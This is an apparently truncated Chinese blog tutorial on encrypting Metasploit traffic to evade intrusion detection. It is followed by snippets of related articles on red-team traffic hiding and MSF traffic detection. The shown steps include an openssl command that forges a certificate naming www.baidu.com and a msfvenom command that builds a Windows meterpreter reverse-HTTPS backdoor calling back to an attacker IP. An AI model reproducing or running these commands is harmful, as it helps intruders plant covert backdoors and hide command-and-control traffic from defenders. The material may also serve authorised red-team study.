MSF流量加密躲避检测

最新推荐文章于 2024-04-15 16:00:17 发布
最新推荐文章于 2024-04-15 16:00:17 发布
阅读量624 收藏
点赞数 1
分类专栏: 流量加密技术 文章标签: 安全 信息安全
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/m0_50526465/article/details/116399228
版权
本文介绍了如何利用Metasploit Framework(MSF)结合OpenSSL进行流量加密,以躲避网络检测。首先,通过OpenSSL生成证书,然后在MSF中设置监听器并启用SSL选项。开启监听后,通过验证HTTPS连接和检查Wireshark抓包来确认流量已加密。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

MSF流量加密躲避检测

对于OpenSSL不了解的,可以去看下我上一篇文章

使用Openssl加密

生成证书

这里C=UK;ST=London等可以对应下面的HTTPS证书看就明白是怎么回事了

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=UK/ST=London/L=London/O=Development/CN=www.baidu.com" \
-keyout www.baidu.com.key \
-out www.baidu.com.crt && \
cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && \
rm -f www.baidu.com.key www.baidu.com.crt

在这里插入图片描述

MSF生成后门

msfvenom -p windows/meterpreter/reverse_winhttps LHOST=192.168.152.130 LPORT=443 PayloadUUIDTracking=true HandlerSSLCert=www.baidu.com.pem StagerVerifySSLCert=true PayloadUUIDName=ParanoidStagedPSH -f psh-cmd -o msf_winhttps.bat
最低0.47元/天 解锁文章
msf cs openssl流量加密
bwt_D的博客
05-29 824
OpenSSL反弹加密shell OpenSSL是一个开放源代码的软件库爆,应用程序可以使这个包来进行安全通信,避免窃听,同时确认另一端连接者的身份。这个包广泛被应用在互联网的网页服务器上 在kali上使用OpenSSL生成自签名证书 openssl req -x509 -newkey rsa:4096 -keyout key.pem -out cert.pem -days 365 -nodes 在kali上监听端口 openssl s_server -quiet -key key.pem -cert
MSF流量加密
Welcome To Myon'Blog !
01-13 774
MSF中生成shell,并上线运行时。都是通过`http` `https` `tcp`等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
红队隧道加密MSF流量加密(二)
xf555er的博客
11-26 2395
如今大多数企业的内网都部署了流量审计服务, 用来专门分析流量特征, 比如后门特征和行为特征若直接使用Metasploit对内网进行横向渗透, 其产生的流量会很容易被内网防护工具检测出来, 因此需对流量进行加密来绕过检测这里介绍使用OpenSSL对MSF流量进行加密
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
qq_50854662的博客
06-01 1321
红蓝对抗之流量加密(Openssl加密传输、MSF流量加密、CS修改profile进行流量加密)
MSF流量加密_msf 流量加密,网络安全进程保活黑科技实现原理解密及方法
2401_84181286的博客
04-10 433
我这里是 msf6使用 ls 命令查前面生成的相应证书和文件。
流量加密技术
课嗨教育的专栏
09-09 1375
目录 一、使用 Openssl 反弹加密 shell ​ 二、MSF 流量加密躲避检测 一、使用 Openssl 反弹加密 shell 红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要横行渗透,往往 需要反弹 shell,如果反弹 shell 都是明文传输,那么内网里有 IDS 或者防护软件 会进行流量进行分析,检测带有攻击特征,很快被发现,如果蓝队对攻击流量回 溯分析,就可以复现攻击的过程。此时红队攻击就会暴漏出来,整个项目都要停 止。 使用 wireshark 抓包直接
MSF学习
willow_liang的博客
12-03 2056
目录 Metasploit模块 主机扫描 查找扫描模块 使用扫描模块 使用nmap扫描 搜索和使用samba的漏洞利用模块 后渗透攻击:信息收集 使用ms17-010对win7进行渗透 进程迁移 查看系统信息 截图 文件系统命令 权限提升 将meterpreter转换为后台执行 令牌窃取 hash攻击 或者上传pwdump,wce工具获取hash 使用mimikatz抓取密码 后渗透攻击:后门 1.Cymothoa后门 2.Persistence后门 3.w.
MSF流量加密_msf 流量加密,2024最新阿里网络安全高级面试题总结
HUAXIAL的博客
04-08 411
MSF中生成shell,并上线运行时。都是通过httphttpstcp等协议传输。虽然MSF本身会对流量进行加密,但MSF太出名以致于其加密特征容易被IPS,WAF等可以检测带有攻击的特征的设备拦截或记录。
网络安全进阶篇之流量加密(十三章-2)MSF流量加密躲避检测
划水的小白白
05-19 3560
文章目录一、为什么要加密二、创建证书三、上线MSF四、抓取流量测试五、不上线的情况5.1、经过测试win7系统无法上线。5.2、看看配置是否正确 一、为什么要加密 为了防止主机被入侵,现在大部分的内网环境都装有流量审计工具, 专门用来分析审查流量特征,分析网络流量,如后门特征、行为特征, 像 metasploit 在内网做横行渗透时,这些流量很容易就能被检测出来, 所以做好流量加密,就能避免审计工具检测出来。 大概过程: 使用openssl生成加密正常, msf生成木马的时候将证书加进去, 设置
msf后门流量分析
最新发布
2301_76227305的博客
04-15 2320
以上就是msf后门流量的特征啦最后,以上仅为个人的拙见,如何有不对的地方,欢迎各位师傅指正与补充,有兴趣的师傅可以一起交流学习。
流量加密小结
RestoreJustice的博客
09-17 413
在红队进行渗透测试的后续渗透阶段为了扩大战果,往往需要进行横行渗透,所以需要拿到shell建立与目标之间的通信,当目标主机网络环境存在网络防御检测系统时(IDS、IPS等),如果攻击机与目标间通信的流量是明文传输,那么网络防御检测系统会检测出通信内容中带有的攻击特征,并对当前通信进行告警和阻止
webshell管理工具-冰蝎(Behinder)的安装和基础使用(msf联动,流量特征)
热门推荐
黄乔国PHP
03-22 1万+
冰蝎是一款基于Java开发的动态加密通信流量的新型Webshell客户端,由于通信流量加密,传统的WAF、IDS 设备难以检测,给威胁狩猎带来较大挑战。冰蝎其最大特点就是对交互流量进行对称加密,且加密密钥是由随机数函数动态生成,因此该客户端的流量几乎无法检测。在流量层,冰蝎的aes特征一直是厂商查杀的重点,在主机层,aes相关的API也是一个强特征。既然是特征,那就一定存在一个一成不变的常量,那我们就把这个特征泛化一下,让他成为变量。为了一劳永逸解决这个问题,
应急响应-MSF流量分析&模式模块&特征提取
SuperherRo的博客
04-13 2037
战后-流量分析-MSF
msf流量通讯特征修改
qq_52839196的博客
02-07 4601
msf流量通讯特征修改
MSF&CobaltStrik流量隐藏
qq_45434762的博客
12-05 1475
本文内容涉及程序/技术原理可能带有攻击性,仅用于安全研究和教学使用,务必在模拟环境下进行实验,请勿将其用于其他用途。因此造成的后果自行承担,如有违反国家法律则自行承担全部法律责任,与作者及...
【红队APT】反朔源&流量加密&CS&MSF&证书指纹&C2项目&CDN域前置
今天是几号的博客
04-18 2670
生成后在虚拟机中上线,不过遇到了奇怪的事情就是,我在上线的虚拟机中抓不到http流量的数据包,而在物理机中抓到了(emmm我也不太懂为什么会这样)红队进行权限控制,主机开始限制出网,尝试走常见出网协议http/https,结果流量设备入侵检测检测系统发现异常,尝试修改工具指纹特征加密流量防止检测,结果被定位到控制服务器,这里可以看到msf自带的证书,这里我们对该证书进行伪装(这里其实流量上没做什么改变,知识对默认证书指纹做了修改)这里可以看到,流量进行了加密,只能隐约的看到一些ssl证书信息。
常见Webshell&重大漏洞的流量特征(附解密流量工具)
Python_0011的博客
11-10 8103
攻防演练中,经常会看到一些加密流量,又分不清楚是不是误报,本文总结了一些常见的流量特征,附流量解密工具。
Shellcode加密分离加载器:MSF与CS支持
在描述中提到的“支持msf和cs”,指的是该shellcode加载器兼容Metasploit Framework(msf)和 Covenant(cs)。Metasploit是一个流行的渗透测试框架,它提供了一套用于发现安全漏洞的工具。Covenant则是基于.NET的后...
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值